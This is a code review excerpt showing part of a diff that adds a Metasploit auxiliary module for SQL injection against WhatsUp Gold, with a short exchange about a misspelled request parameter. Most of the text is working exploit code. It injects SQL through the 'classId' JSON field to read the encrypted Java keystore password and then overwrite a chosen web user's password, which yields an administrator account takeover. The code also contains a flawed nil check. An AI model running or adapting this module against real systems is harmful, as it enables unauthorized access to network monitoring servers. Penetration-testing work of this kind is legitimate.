modules/auxiliary/admin/http/whatsup_gold_sqli.rb

```diff
@@ -0,0 +1,193 @@
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    body = {
+      KeyStorePassword: datastore['NEW_PASSWORD'],
+      TrustStorePassword: datastore['NEW_PASSWORD']
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/WugSystemAppSettings/JMXSecurity'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 500
+      fail_with(Failure::UnexpectedReply, 'Unexpected server HTTP status code received.')
+    end
+
+    marker = Rex::Text.rand_text_alpha(10)
+    deviceid = Rex::Text.rand_text_numeric(5)
+
+    body = {
+      deviceId: deviceid.to_s,
+      classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='#{marker}'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--",
+      range: rand(1..9).to_s,
+      n: rand(1..9).to_s,
+      start: rand(1..9).to_s,
+      end: rand(1..9).to_s,
+      businesdsHoursId: rand(1..9).to_s
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/Platform/PerformanceMonitorErrors/HasErrors'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.body == 'false'
+      fail_with(Failure::UnexpectedReply, 'Unexpected server response received.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/Platform/Filter/AlertCenterItemsReportThresholds')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected server response received.')
+    end
+
+    body = res.body.to_s
+    json_body = JSON.parse(body)
+
+    result = json_body.find { |item| item['DisplayName'].start_with?(marker.to_s) }
+    unless result || result.nil
+      fail_with(Failure::UnexpectedReply, 'Coud not find DisplayName match with marker.')
+    end
+
+    display_name = result['DisplayName'].to_s
+    display_name_f = display_name.sub(marker.to_s, '')
+    byte_v = display_name_f.split(',')
+    hex_v = byte_v.map { |value| value.to_i.to_s(16).upcase.rjust(2, '0') }
+    enc_pass = '0x' + hex_v.join
+    vprint_status('Encrypted password: ' + enc_pass)
+
+    body = {
+      deviceId: deviceid.to_s,
+      classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = #{enc_pass} where sUserName = '#{datastore['USERNAME']}';--",
+      range: rand(1..9).to_s,
+      n: rand(1..9).to_s,
+      start: rand(1..9).to_s,
+      end: rand(1..9).to_s,
+      businesdsHoursId: rand(1..9).to_s
```

Comment:
Is `businesdsHoursId` a typo? And if it is does it need to be sent if it's working without the correct spelling?

Reply:
Yes, that was a typo - it should have been `businessHoursId`. I've run a couple tests and it seems it's not required to get the desired behaviour, hence I have removed it. Thank you!